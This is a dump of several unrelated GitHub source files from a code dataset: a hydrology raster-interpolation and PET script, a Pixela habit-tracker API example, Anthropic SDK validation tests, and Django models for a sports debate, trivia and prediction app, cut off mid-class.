axis=1)\n return d\n\n\nvbs = getVbs()\nvalidSolversOnly = getVbs(outputAllSolvers=False)\nwithoutPlanning = getVbs(outputAllSolvers=False, removePlanning=True)\nvbs.to_csv(\"results_vbs.csv\", index=False)\nvalidSolversOnly.to_csv(\"results_vbs_main.csv\", index=False)\nwithoutPlanning.to_csv(\"results_vbs_main_noPlan.csv\", index=False)\n","repo_name":"satcompetition/2020","sub_path":"paper/vbs/vbs.py","file_name":"vbs.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"50"} +{"seq_id":"25123683889","text":"#!/bin/env python3\n\"\"\"\n\n\n\"\"\"\n\n\n#######################################################################\n# Imports\n#######################################################################\n\nimport netCDF4 as nc\nimport pcraster as pcr\nimport numpy as np\nimport datetime\nimport os\nimport time\nimport math\nimport pyproj\nfrom scipy.interpolate import NearestNDInterpolator\nfrom scipy import interpolate\nfrom tqdm import tqdm\n\n\n#######################################################################\n# Functions\n#######################################################################\n\n\ndef init_cellcenters_esrii(metadata):\n\n ncols = int(metadata[0][1])\n nrows = int(metadata[1][1])\n x_center = float(metadata[2][1])\n y_center = float(metadata[3][1])\n cellsize = float(metadata[4][1])\n\n cell_centers = np.zeros((nrows, ncols, 2))\n\n for i in range(0, nrows):\n for j in range(0, ncols):\n cell_centers[i][j][0] = x_center + cellsize * j\n cell_centers[i][j][1] = 
(y_center + cellsize * (nrows - 1)) - cellsize * i\n\n return cell_centers\n\n\ndef init_cellcenter(rows, cols, cell_size, xmin, ymin):\n\n cell_centers = np.zeros((rows, cols, 2))\n\n for i in range(0, rows):\n for j in range(0, cols):\n cell_centers[i][j][0] = xmin + cell_size / 2.0 + cell_size * j\n cell_centers[i][j][1] = ymin - cell_size / 2.0 - cell_size * i\n\n return cell_centers\n\n\ndef convert_lat_to_rad(lat):\n\n x1 = float(lat[0:2])\n x2 = float(lat[3:5])\n x3 = lat[-1]\n if x3 == \"N\":\n dec = x1 + x2 / 60.0\n if x3 == \"S\":\n dec = -x1 - x2 / 60.0\n radians = math.pi / 180.0 * dec\n\n return radians\n\n\n#######################################################################\n# time things\n#######################################################################\n\nstart_time = time.time()\n\n#######################################################################\n# pcraster blueprint\n#######################################################################\n\nworking_folder = r\"/home/iwbworkstation/Desktop/working_dir/model_rerun_paper1/Model_200m_HBV/staticmaps\"\nmasterdem = \"wflow_dem.map\"\n\npcr.setglobaloption(\"unitcell\")\n\npcr.setclone(working_folder + \"/\" + masterdem)\n\nrows = pcr.clone().nrRows()\ncols = pcr.clone().nrCols()\n\ncell_size = pcr.clone().cellSize()\n\n# coordinates are in upper left corner\nxmin = pcr.clone().west()\nymin = pcr.clone().north()\nxmax = xmin + cell_size * cols\nymax = ymin - cell_size * rows\n\ncell_centers = init_cellcenter(rows, cols, cell_size, xmin, ymin)\n\nprint(\"Original cell centers initialized in \" + str(time.time() - start_time) + \" s\")\n\n#######################################################################\n# NetCDF settings\n#######################################################################\n\nrain = r\"/media/iwbworkstation/My Passport/Dissertation/3_Hydrology/0_Model_Data/4_Precepitation/Forcing040506/RR/RR\"\ntemp = r\"/media/iwbworkstation/My Passport/Dissertation/3_Hydrology/0_Model_Data/4_Precepitation/Forcing040506/TT/TT\"\nrad = r\"/media/iwbworkstation/Volume/Dissertation/3_Hydrology/0_Model_Data/4_Precepitation/Strahlung_Muerz\"\nresultfolder = r\"/home/iwbworkstation/Desktop/working_dir/model_rerun_paper1/NSGA2/Model_200m_HBV/inmaps_040506\"\n\nINCA_epsg = \"epsg:31258\"\nmodel_epsg = \"epsg:32633\"\n\n#######################################################################\n\n# Initialize Projections\ninProj = pyproj.Proj(init=INCA_epsg)\noutProj = pyproj.Proj(init=model_epsg)\n\n# Count all the files in the given folder\npath, dirs, files = next(os.walk(rain))\ncount = len(files)\n\n# allocate rain array\nrain_input = np.zeros((count, rows, cols), dtype=\"float32\")\n\ncurrent_prog = 0\n\npbar1 = tqdm(total=count)\n\n# Rainloop\ni = 0\nfor subdir, dirs, files in os.walk(rain):\n # loops of files in folder AND SORTES them alphabetically\n for file in sorted(files):\n # read some metadata from the first file and compute cell centers\n # this is only done once since they don't change\n # create file path\n path = rain + \"/\" + file\n if i == 0:\n # read INCA file in ESRII format, header only\n metadata = np.genfromtxt(path, max_rows=6, dtype=str)\n # compute cell centers in original projection\n centers = init_cellcenters_esrii(metadata)\n centers[:, :, 0], centers[:, :, 1] = pyproj.transform(\n inProj, outProj, centers[:, :, 0], centers[:, :, 1]\n )\n # reshapes cell centers matrix for interpolator\n centers_flatt = centers.reshape(len(centers[:, 0]) * len(centers[0, :]), 2)\n # flatten cell 
centers from master dem for interpolator\n orig_centers = cell_centers.reshape(rows * cols, 2)\n\n # read INCA file in ESRII format, precipitation data\n values = np.genfromtxt(path, skip_header=6)\n # reshape values array for interpolator\n values_flatt = values.reshape(len(centers[:, 0]) * len(centers[0, :]))\n # create the nearest neighbor interpolation function\n myInterpolator1 = NearestNDInterpolator(centers_flatt, values_flatt)\n # interpolated precipitation values\n rain_interp = myInterpolator1(orig_centers)\n # reshape them back to be writebale to the netcdf file\n rain_inter2D = rain_interp.reshape(rows, cols)\n # convert to pcr\n rain_inter2D_pcr = pcr.numpy2pcr(pcr.Scalar, rain_inter2D, -9999)\n pcrpath = resultfolder + \"/P\" + \"{:011.3f}\".format((i) / 1000.0)\n pcr.report(rain_inter2D_pcr, pcrpath)\n # write the each timestep to global precipitation matrix\n rain_input[i, :, :] = rain_inter2D[:, :]\n # count i up\n pbar1.update(1)\n\n i += 1\n\n\nprint(\"Precipitation array generated in \" + str(time.time() - start_time) + \" s\")\n#####################################\n# Temperature\n#####################################\n\n# allocate temperature matrix\ntemp_input = np.zeros((count, rows, cols), dtype=\"float32\")\n\npbar2 = tqdm(total=count)\n\n## Temperature loop also calculate PET\ni = 0\nfor subdir, dirs, files in os.walk(temp):\n # loops of files in folder AND SORTES them alphabetically\n # metadata is used from precipitation\n for file in sorted(files):\n path = temp + \"/\" + file\n # create and flatten temperature values\n values = np.genfromtxt(path, skip_header=6)\n values_flatt = values.reshape(len(centers[:, 0]) * len(centers[0, :]))\n # create new temperature interpolator\n myInterpolator2 = NearestNDInterpolator(centers_flatt, values_flatt)\n # interpolate and reshape temperature values\n temp_interp = myInterpolator2(orig_centers)\n temp_inter2D = temp_interp.reshape(rows, cols)\n temp_inter2D_pcr = pcr.numpy2pcr(pcr.Scalar, temp_inter2D, -9999)\n pcrpath = resultfolder + \"/TEMP\" + \"{:08.3f}\".format((i) / 1000.0)\n pcr.report(temp_inter2D_pcr, pcrpath)\n # write to global temperature matrix\n temp_input[i, :, :] = temp_inter2D[:, :]\n\n # handle PET\n # datestring\n datepart = file.split(\"_\")[2]\n # FIXME: magic string\n path_rad = rad + \"/\" + \"Muerz_GL_\" + datepart + \"00_00.asc\"\n\n rad_vals = np.genfromtxt(path_rad, skip_header=6)\n\n # remove potential nan values\n # check if nan in values list\n pot_nans = np.isnan(np.sum(rad_vals))\n # if nans are encountered\n if pot_nans:\n # create mask of nan values\n mask = np.isnan(rad_vals)\n # interpolate values\n rad_vals[mask] = np.interp(\n np.flatnonzero(mask), np.flatnonzero(~mask), rad_vals[~mask]\n )\n\n rad_flatt = rad_vals.reshape(len(centers[:, 0]) * len(centers[0, :]))\n myInterpolator3 = NearestNDInterpolator(centers_flatt, rad_flatt)\n # interpolate and reshape\n rad_interp = myInterpolator3(orig_centers)\n rad_inter2D = rad_interp.reshape(rows, cols)\n\n # compute PET\n phi = 0.646 + 0.0006 * temp_inter2D\n lamb = 1000.0 * (2501 - 2.38 * temp_inter2D)\n delta = (6.107 * 7.5 * 273.3 / (273.3 + temp_inter2D) ** 2.0) * np.exp(\n 7.5 * temp_inter2D / (273.3 + temp_inter2D)\n )\n rho = 1000.0\n\n # limit pet to 0\n pet = np.maximum(\n 1000 * 0.75 * (delta / (delta + phi)) * (900 * rad_inter2D / lamb / rho),\n 0.0,\n )\n pet_pcr = pcr.numpy2pcr(pcr.Scalar, pet, -9999)\n pcrpath_pet = resultfolder + \"/PET\" + \"{:09.3f}\".format((i) / 1000.0)\n pcr.report(pet_pcr, pcrpath_pet)\n\n 
pbar2.update(1)\n\n i += 1\n\n# compute parameters required for PET calculation\n\n# inint PET array copy from temperature\n\n\n#\n\n\n# while currentstep < temp_input.shape[0]:\n#\n#\n#\n#\n# # compute lower index\n# lower = int(currentstep)\n# # compute higher index\n# higher = int(currentstep + steps_)\n# # get current month\n# curr_month = julian_month[lower]\n# # get current S from lookup table\n# S0_curr = S0[int(curr_month)-1]\n# # compute tmax, tmin and tmean over averaging period\n# tmax = np.amax(temp_input[lower:higher,:,:],axis = 0)\n# tmin = np.amin(temp_input[lower:higher,:,:],axis = 0)\n# tmean = np.mean(temp_input[lower:higher,:,:],axis = 0)\n#\n# # compute evatranspirtation for each field\n# ET = 0.0023*S0_curr*np.sqrt(tmax-tmin)*(tmean+17.8)\n# # now divide equally on averaging period\n# ET = ET / float(steps_)\n# # now fill the array\n# PET_out[lower:higher,:,:] = ET\n#\n# currentstep += steps_\n#\n# for i in range(0,len(PET_out)):\n# PET_temp = PET_out[i,:,:]\n# pet_pcr = pcr.numpy2pcr(pcr.Scalar,PET_temp,-9999)\n# pcrpath = resultfolder + '/PET' + '{:09.3f}'.format((i)/1000.)\n# pcr.report(pet_pcr,pcrpath)\n","repo_name":"poettler-ric/pylib","sub_path":"pcrmap_handler_radiation.py","file_name":"pcrmap_handler_radiation.py","file_ext":"py","file_size_in_byte":9915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"8971054416","text":"import requests\nfrom datetime import datetime\n\nTOKEN = \"ajshd18u43j3rowad\"\nUSERNAME = \"angelov-g\"\nGRAPH_ID = \"graph1\"\n\nheaders = {\n \"X-USER-TOKEN\": TOKEN\n}\n\n# CREATE USER\npixela_endpoint = \"https://pixe.la/v1/users\"\n\nuser_params = {\n \"token\": TOKEN,\n \"username\": USERNAME,\n \"agreeTermsOfService\": \"yes\",\n \"notMinor\": \"yes\"\n}\n\n# response = requests.post(url=pixela_endpoint, json=user_params)\n# print(response.text)\n\n# CREATE GRAPH available at https://pixe.la/v1/users/angelov-g/graphs/graph1.html\ngraph_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs\"\n\ngraph_config = {\n \"id\": GRAPH_ID,\n \"name\": \"Walking Graph\",\n \"unit\": \"Km\",\n \"type\": \"float\",\n \"color\": \"sora\"\n}\n\n# response = requests.post(url=graph_endpoint, json=graph_config, headers=headers)\n# print(response.text)\n\n# Format today's date to match the API date format\ntoday = datetime.now().strftime(\"%Y%m%d\")\n\n# ADD PIXEL TO GRAPH\nadd_pixel_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}\"\n\nadd_pixel_config = {\n \"date\": today,\n \"quantity\": \"10\"\n}\n\n# response = requests.post(url=add_pixel_endpoint, json=add_pixel_config, headers=headers)\n# print(response.text)\n\n# UPDATE PIXEL\nupdate_pixel_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}/{today}\"\n\nupdate_pixel_config = {\n \"quantity\": \"15\"\n}\n\n# response = requests.put(url=update_pixel_endpoint, json=update_pixel_config, headers=headers)\n# print(response.text)\n\n# DELETE PIXEL\n# endpoint is the same as the update pixel endpoint\n# response = requests.delete(url=update_pixel_endpoint, headers=headers)\n# print(response.text)\n","repo_name":"angelov-g/100-days-of-code","sub_path":"intermediate-plus/habit-tracker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"26233720578","text":"import pytest\nimport anthropic\nfrom anthropic import api, ApiException, tokenizer\nimport os\n\ndef test_prompt_validator():\n # No 
exceptions expected\n api._validate_request({\"max_tokens_to_sample\": 1, \"prompt\": f\"{anthropic.HUMAN_PROMPT} Hello{anthropic.AI_PROMPT}\"})\n api._validate_request({\"max_tokens_to_sample\": 1, \"prompt\": f\"{anthropic.HUMAN_PROMPT} Hello{anthropic.AI_PROMPT} First answer{anthropic.HUMAN_PROMPT} Try again{anthropic.AI_PROMPT}\"})\n with pytest.raises(ApiException):\n api._validate_request({\"max_tokens_to_sample\": 1, \"prompt\": f\"{anthropic.HUMAN_PROMPT} Hello\"})\n with pytest.raises(ApiException):\n api._validate_request({\"max_tokens_to_sample\": 1, \"prompt\": f\"{anthropic.AI_PROMPT} \"})\n with pytest.raises(ApiException):\n api._validate_request({\"max_tokens_to_sample\": 1, \"prompt\": f\"Human: Hello{anthropic.AI_PROMPT}\"})\n\ndef test_sample_length():\n # No exceptions expected\n good_request = {\"max_tokens_to_sample\": 1, \"prompt\": f\"{anthropic.HUMAN_PROMPT} Hello{anthropic.AI_PROMPT}\"}\n api._validate_request(good_request)\n bad_request = good_request.copy()\n bad_request[\"max_tokens_to_sample\"] = 10000\n with pytest.raises(ApiException):\n api._validate_request(bad_request)\n\n bad_request = good_request.copy()\n bad_request[\"prompt\"] = bad_request[\"prompt\"] * 2000\n with pytest.raises(ApiException):\n api._validate_request(bad_request)\n\ndef test_prompt_validator_fail(monkeypatch):\n # Ensure we don't have any tokenizer loaded or saved\n monkeypatch.setattr(tokenizer, \"CLAUDE_TOKENIZER_REMOTE_FILE\", tokenizer.CLAUDE_TOKENIZER_REMOTE_FILE + '-but-nonexistent')\n tokenizer.claude_tokenizer = None\n os.remove(tokenizer._get_tokenizer_filename())\n # Now verify a good request fails open\n api._validate_prompt_length({\"max_tokens_to_sample\": 1, \"prompt\": f\"{anthropic.HUMAN_PROMPT} Hello{anthropic.AI_PROMPT}\"})\n # And now verify a bad request fails open too\n api._validate_prompt_length({\"max_tokens_to_sample\": 100000, \"prompt\": f\"{anthropic.HUMAN_PROMPT} Hello{anthropic.AI_PROMPT}\"})\n\n","repo_name":"kpister/prompt-linter","sub_path":"data/scraping/repos/anthony-sarkis~anthropic-sdk-python/tests~test_api.py","file_name":"tests~test_api.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"3269459462","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nimport os\nimport random\n\n# https://docs.djangoproject.com/en/3.0/ref/contrib/auth/#django.contrib.auth.models.User\n# using default user class\n\n\ndef hash_directory(instance, filename):\n x, file_extension = os.path.splitext(filename)\n return (\n f\"user/pictures/{instance.hash_value[0:2]}/{instance.hash_value[2:4]}/{instance.hash_value}\"\n + file_extension\n )\n\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True)\n status = models.CharField(max_length=100, blank=True)\n about = models.CharField(max_length=300, blank=True)\n agree = models.ManyToManyField(\"DebateComment\", through=\"Rate\")\n favourite_sports = models.ManyToManyField(\"Sport\")\n followers = models.ManyToManyField(\"Profile\")\n\n @property\n def questionaire_registered(self):\n qs = QuestionaireUserResponse.objects.filter(user=self)\n return len(qs) != 0\n\n @property\n def average_acs(self):\n return ACS.objects.filter(profile=self).aggregate(models.Avg(\"score\"))\n\n\nclass ProfilePicture(models.Model):\n name = models.CharField(max_length=100)\n size = 
models.CharField(max_length=100)\n content_type = models.CharField(max_length=100, blank=True)\n charset = models.CharField(max_length=100, blank=True, null=True)\n file = models.ImageField(upload_to=hash_directory, null=True)\n hash_value = models.CharField(max_length=64)\n profile = models.OneToOneField(\"Profile\", on_delete=models.CASCADE, blank=True)\n\n\n# class Post(models.Model):\n# content = models.CharField(max_length=100, blank=False, null=False)\n# user = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n# attached_files = models.FileField(\n# upload_to=\"user_id/files\"\n# ) # Add upload argument (Make a folder named after each user)\n\n\nclass DebatePost(models.Model):\n content = models.CharField(max_length=500, blank=False, null=False)\n title = models.CharField(max_length=100, unique=True)\n post_date = models.DateTimeField(auto_now_add=True)\n sport = models.ForeignKey(\"Sport\", on_delete=models.CASCADE, blank=True, null=True)\n EXPERT_ANALYST = \"E\"\n PRO_ANALYST = \"P\"\n ANALYST = \"A\"\n FANALYST = \"F\"\n ACS_RANK = [\n (EXPERT_ANALYST, \"Expert Analyst\"),\n (PRO_ANALYST, \"Pro Analyst\"),\n (ANALYST, \"Analyst\"),\n (FANALYST, \"Fanalyst\"),\n ]\n acs_rank = models.CharField(\n max_length=1, choices=ACS_RANK, default=FANALYST\n ) # attached_files = models.FileField(\n # upload_to=\"user_id/files\"\n # ) # Add upload argument (Make a folder named after each user)\n # its not an actual requirement so we'll try to make it for another sprint\n\n\nclass DebateComment(models.Model):\n post = models.ForeignKey(\"DebatePost\", on_delete=models.CASCADE)\n commenter = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n content = models.CharField(max_length=500, blank=False, null=False)\n time = models.DateTimeField(auto_now_add=True)\n\n @property\n def ratingAverage(self):\n return Rate.objects.filter(comment=self).aggregate(models.Avg(\"agreement\"))\n\n\nclass Rate(models.Model):\n rater = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n comment = models.ForeignKey(\"DebateComment\", on_delete=models.CASCADE)\n agreement = models.IntegerField(\n validators=[MaxValueValidator(10), MinValueValidator(1)],\n blank=False,\n null=False,\n )\n\n class Meta:\n unique_together = [\"rater\", \"comment\", \"agreement\"]\n\n\nclass ACS(models.Model):\n score = models.IntegerField()\n profile = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n sports = models.ForeignKey(\"Sport\", on_delete=models.CASCADE)\n\n class Meta:\n unique_together = [\"profile\", \"sports\"]\n\n\n# For trivia\nclass TriviaQuestion(models.Model):\n content = models.CharField(max_length=100, blank=False, null=False)\n correct_answer = models.ForeignKey(\n \"TriviaAnswer\", on_delete=models.CASCADE, related_name=\"correct_answer\"\n )\n related_to_sport = models.ManyToManyField(\"Sport\")\n\n\n# For trivia\nclass TriviaAnswer(models.Model):\n parent_question = models.ForeignKey(\n \"TriviaQuestion\", on_delete=models.CASCADE, null=True\n )\n content = models.CharField(max_length=100, blank=False, null=False)\n # TODO: Think we should store the trivia responses in the database can be done in later sprint\n\n\nclass TriviaInstance(models.Model):\n # represents an instance of trivia for a user\n # basically this is trivia_history\n questions = models.ManyToManyField(\"TriviaQuestion\")\n user = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n sport = models.ForeignKey(\"Sport\", on_delete=models.CASCADE)\n creation_date = models.DateTimeField(auto_now_add=True)\n score 
= models.CharField(max_length=100, blank=True)\n    other_user = models.ForeignKey(\n        \"Profile\",\n        related_name=\"other_user\",\n        on_delete=models.CASCADE,\n        blank=True,\n        null=True,\n    )\n\n    def select_questions(self):\n        questions = TriviaQuestion.objects.filter(related_to_sport=self.sport)\n        random_questions = random.sample(list(questions), 11)\n        for q in random_questions:\n            self.questions.add(q)\n        self.save()\n\n\nclass TriviaResponse(models.Model):\n    trivia_instance = models.ForeignKey(\"TriviaInstance\", on_delete=models.CASCADE)\n    question = models.ForeignKey(\"TriviaQuestion\", on_delete=models.CASCADE)\n    answer = models.ForeignKey(\"TriviaAnswer\", on_delete=models.CASCADE, null=True)\n    user = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n    start_time = models.DateTimeField(blank=False)\n    submission_time = models.DateTimeField(blank=False)\n\n    @property\n    def is_correct(self):\n        # case where there was no answer provided\n        if self.answer is None:\n            return False\n        return self.question.correct_answer == self.answer\n\n\nclass BaseAcsHistory(models.Model):\n    # never instantiated directly; this is just the base class\n    delta = models.IntegerField()\n    profile = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n    date = models.DateField(auto_now_add=True)\n    sport = models.ForeignKey(\"Sport\", on_delete=models.CASCADE)\n    score = models.IntegerField(null=True)\n\n    def update_acs(self):\n        # updates actual acs score from ACS table\n        # either implement a generic function here\n        # or override it in the subclass\n\n        # Check whether or not the combination of user & sport is in the table.\n        try:\n            acs = ACS.objects.get(profile=self.profile, sports=self.sport)\n            acs.score = acs.score + self.delta\n            if acs.score < 100:\n                acs.score = 100\n            acs.save()\n            self.score = acs.score\n            self.save()\n        except ACS.DoesNotExist:\n            acs = ACS.objects.create(\n                profile=self.profile, sports=self.sport, score=self.delta\n            )\n            if acs.score < 100:\n                acs.score = 100\n                acs.save()\n            self.score = acs.score\n            self.save()\n\n    @classmethod\n    # Note: profile is a profile object and sport is a sport object.\n    def create(cls, delta, profile, sport):\n        acs_history = cls.objects.create(delta=delta, profile=profile, sport=sport)\n        acs_history.update_acs()\n        return acs_history\n\n\nclass TriviaAcsHistory(BaseAcsHistory):\n    source_type = \"T\"\n    trivia_instance = models.ForeignKey(\n        \"TriviaInstance\", on_delete=models.CASCADE, null=True\n    )\n\n\nclass DebateAcsHistory(BaseAcsHistory):\n    source_type = \"D\"\n    debate_comment = models.ForeignKey(\n        \"DebateComment\", on_delete=models.CASCADE, null=True\n    )\n\n\nclass PredictionAcsHistory(BaseAcsHistory):\n    source_type = \"P\"\n    prediction = models.ForeignKey(\"Prediction\", on_delete=models.CASCADE, null=True)\n\n\nclass Sport(models.Model):\n    name = models.CharField(max_length=100, blank=False, null=False, unique=True)\n\n\nclass QuestionaireQuestion(models.Model):\n    QUANTITATIVE = \"QN\"\n    QUALITATIVE = \"QL\"\n    SPORT = \"S\"\n    TEAM = \"T\"\n    PLAYER = \"P\"\n    CUSTOM = \"C\"  # Pulls from a QuestionaireAnswer\n    QUESTION_TYPE = [\n        (QUANTITATIVE, \"Quantitative\"),\n        (QUALITATIVE, \"Qualitative\"),\n        (SPORT, \"Sport\"),\n        (TEAM, \"Team\"),\n        (PLAYER, \"Player\"),\n        (CUSTOM, \"Custom\"),\n    ]\n    question_content = models.CharField(max_length=300, blank=False, unique=True)\n    question_type = models.CharField(\n        max_length=2, choices=QUESTION_TYPE, default=QUANTITATIVE\n    )\n    max_int = models.IntegerField(blank=True, null=True)\n    min_int = models.IntegerField(blank=True, null=True)\n\n    
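The try/except in `update_acs` above re-implements what Django's `get_or_create` already provides, and the 100-point floor is applied in two places. A sketch of an equivalent, shorter version (behavior inferred from the code above):

```python
def update_acs(self):
    # get_or_create returns (instance, created): a new row starts at delta,
    # an existing row is incremented, and both paths share one clamp + save.
    acs, created = ACS.objects.get_or_create(
        profile=self.profile, sports=self.sport, defaults={"score": self.delta}
    )
    if not created:
        acs.score += self.delta
    acs.score = max(acs.score, 100)  # the ACS score never drops below 100
    acs.save()
    self.score = acs.score
    self.save()
```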
class Meta:\n constraints = [\n models.CheckConstraint(\n check=models.Q(max_int__gte=models.F(\"min_int\")), name=\"max_gte_min\"\n )\n ]\n\n\nclass QuestionaireAnswer(models.Model):\n # This represents a custom enumeration of values for a specific QuestionanaireQuestion\n question = models.ForeignKey(\"QuestionaireQuestion\", on_delete=models.CASCADE)\n custom_answer = models.CharField(max_length=300, blank=False)\n\n class Meta:\n unique_together = [\"question\", \"custom_answer\"]\n\n\nclass QuestionaireUserResponse(models.Model):\n # was not able to get proper constraints for this\n # will need to do the check at the viewset level\n user = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n question = models.ForeignKey(\"QuestionaireQuestion\", on_delete=models.CASCADE)\n qualitative_response = models.CharField(max_length=300, blank=True, null=True)\n quantitative_response = models.IntegerField(blank=True, null=True)\n sport = models.ForeignKey(\"Sport\", on_delete=models.CASCADE, blank=True, null=True)\n team = models.ForeignKey(\"Team\", on_delete=models.CASCADE, blank=True, null=True)\n player = models.ForeignKey(\n \"Player\", on_delete=models.CASCADE, blank=True, null=True\n )\n custom_answer = models.ForeignKey(\n \"QuestionaireAnswer\", on_delete=models.CASCADE, blank=True, null=True\n )\n\n class Meta:\n unique_together = [\"user\", \"question\"]\n\n\nclass PredictionChoice(models.Model):\n predicter = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n predicting_for = models.ForeignKey(\"Prediction\", on_delete=models.CASCADE)\n\n class Meta:\n unique_together = [\"predicter\", \"predicting_for\"]\n\n\nclass MvpPredictionChoice(PredictionChoice):\n player = models.ForeignKey(\n \"Player\", on_delete=models.CASCADE, null=True, blank=True\n )\n\n\nclass RookiePredictionChoice(PredictionChoice):\n player = models.ForeignKey(\n \"Player\", on_delete=models.CASCADE, null=True, blank=True\n )\n\n\nclass PlayOffPredictionChoice(PredictionChoice):\n team = models.ForeignKey(\"Team\", on_delete=models.CASCADE, null=True, blank=True)\n\n\nclass Prediction(models.Model):\n title = models.CharField(max_length=100, blank=True)\n relates_to = models.ForeignKey(\"Sport\", on_delete=models.CASCADE)\n year = models.CharField(\n max_length=4\n ) # this is the year in YYYY format. 
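The `max_gte_min` constraint above is enforced by the database rather than by Python, so an inverted pair only fails when the row is written. A small illustrative snippet of that behavior (assumes the models above are migrated; the question text is made up):

```python
from django.db import IntegrityError

try:
    # max_int < min_int violates the max_gte_min CheckConstraint on INSERT
    QuestionaireQuestion.objects.create(
        question_content="How many championships will they win?",
        question_type="QN",
        min_int=10,
        max_int=1,
    )
except IntegrityError:
    print("rejected by the max_gte_min constraint")
```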
so 2020 for example\n is_locked = models.BooleanField(default=False)\n\n @staticmethod\n def prediction_response(year, user):\n # This should be a dictionary of the json response\n result = {}\n result[\"year\"] = year\n # Check if year is in the db or not.\n given_year = Prediction.objects.filter(year=year)\n if len(given_year) == 0:\n return 400\n result[\"sport\"] = \"Basketball\"\n mvp = {}\n roty = {}\n playoff = []\n\n # Gets MVP information\n mvp_id = MvpPrediction.objects.filter(year=year).values()\n mvp[\"title\"] = mvp_id[0][\"title\"]\n mvp[\"id\"] = mvp_id[0][\"id\"]\n mvp[\"is_locked\"] = mvp_id[0][\"is_locked\"]\n mvp[\"correct_player\"] = mvp_id[0][\"correct_player_id\"]\n if mvp[\"correct_player\"] is None:\n mvp[\"correct_player_name\"] = None\n else:\n mvp[\"correct_player_name\"] = (\n Player.objects.filter(id=mvp[\"correct_player\"]).values()[0][\n \"first_name\"\n ]\n + \" \"\n + Player.objects.filter(id=mvp[\"correct_player\"]).values()[0][\n \"last_name\"\n ]\n )\n\n if (\n len(\n MvpPredictionChoice.objects.filter(\n predicter=user, predicting_for_id=mvp_id[0][\"id\"]\n )\n )\n == 0\n ):\n mvp[\"player\"] = None\n mvp[\"player_name\"] = None\n else:\n print(\n MvpPredictionChoice.objects.filter(\n predicter=user, predicting_for_id=mvp_id[0][\"id\"]\n ).values()\n )\n mvp[\"player\"] = MvpPredictionChoice.objects.filter(\n predicter=user, predicting_for_id=mvp_id[0][\"id\"]\n ).values()[0][\"player_id\"]\n mvp[\"player_name\"] = (\n Player.objects.filter(id=mvp[\"player\"]).values()[0][\"first_name\"]\n + \" \"\n + Player.objects.filter(id=mvp[\"player\"]).values()[0][\"last_name\"]\n )\n\n result[\"mvp\"] = mvp\n\n # Gets Rookie information\n rookie_id = RotyPrediction.objects.filter(year=year).values()\n roty[\"title\"] = rookie_id[0][\"title\"]\n roty[\"id\"] = rookie_id[0][\"id\"]\n roty[\"is_locked\"] = rookie_id[0][\"is_locked\"]\n roty[\"correct_player\"] = rookie_id[0][\"correct_player_id\"]\n if roty[\"correct_player\"] is None:\n roty[\"correct_player_name\"] = None\n else:\n roty[\"correct_player_name\"] = (\n Player.objects.filter(id=roty[\"correct_player\"]).values()[0][\n \"first_name\"\n ]\n + \" \"\n + Player.objects.filter(id=roty[\"correct_player\"]).values()[0][\n \"last_name\"\n ]\n )\n\n if (\n len(\n RookiePredictionChoice.objects.filter(\n predicter=user, predicting_for_id=rookie_id[0][\"id\"]\n )\n )\n == 0\n ):\n roty[\"player\"] = None\n roty[\"player_name\"] = None\n else:\n roty[\"player\"] = RookiePredictionChoice.objects.filter(\n predicter=user, predicting_for_id=rookie_id[0][\"id\"]\n ).values()[0][\"player_id\"]\n roty[\"player_name\"] = (\n Player.objects.filter(id=roty[\"player\"]).values()[0][\"first_name\"]\n + \" \"\n + Player.objects.filter(id=roty[\"player\"]).values()[0][\"last_name\"]\n )\n result[\"rookie\"] = roty\n\n # Gets the playoff information.\n playoff_id = PlayOffPrediction.objects.filter(year=year).values()\n for item in playoff_id:\n individual_playoff = {}\n individual_playoff[\"title\"] = item[\"title\"]\n individual_playoff[\"id\"] = item[\"id\"]\n individual_playoff[\"is_locked\"] = item[\"is_locked\"]\n individual_playoff[\"correct_team\"] = item[\"correct_team_id\"]\n if individual_playoff[\"correct_team\"] is None:\n individual_playoff[\"correct_team_name\"] = None\n else:\n individual_playoff[\"correct_team_name\"] = Team.objects.filter(\n id=individual_playoff[\"correct_team\"]\n ).values()[0][\"full_name\"]\n\n if (\n len(\n PlayOffPredictionChoice.objects.filter(\n predicter=user, 
predicting_for_id=item[\"id\"]\n                    ).values()\n                )\n                == 0\n            ):\n                individual_playoff[\"team\"] = None\n                individual_playoff[\"team_name\"] = None\n            else:\n                individual_playoff[\"team\"] = PlayOffPredictionChoice.objects.filter(\n                    predicter=user, predicting_for_id=item[\"id\"]\n                ).values()[0][\"team_id\"]\n                individual_playoff[\"team_name\"] = Team.objects.filter(\n                    id=individual_playoff[\"team\"]\n                ).values()[0][\"full_name\"]\n            playoff.append(individual_playoff)\n\n        result[\"playoff\"] = playoff\n        return result\n\n\nclass MvpPrediction(Prediction):\n    type = \"mvp\"  # don't know if we'll need this\n    correct_player = models.ForeignKey(\n        \"Player\", on_delete=models.CASCADE, null=True, blank=True\n    )\n\n\nclass RotyPrediction(Prediction):\n    type = \"rookie\"  # don't know if we'll need this\n    correct_player = models.ForeignKey(\n        \"Player\", on_delete=models.CASCADE, null=True, blank=True\n    )\n\n\nclass PlayOffPrediction(Prediction):\n    correct_team = models.ForeignKey(\n        \"Team\", 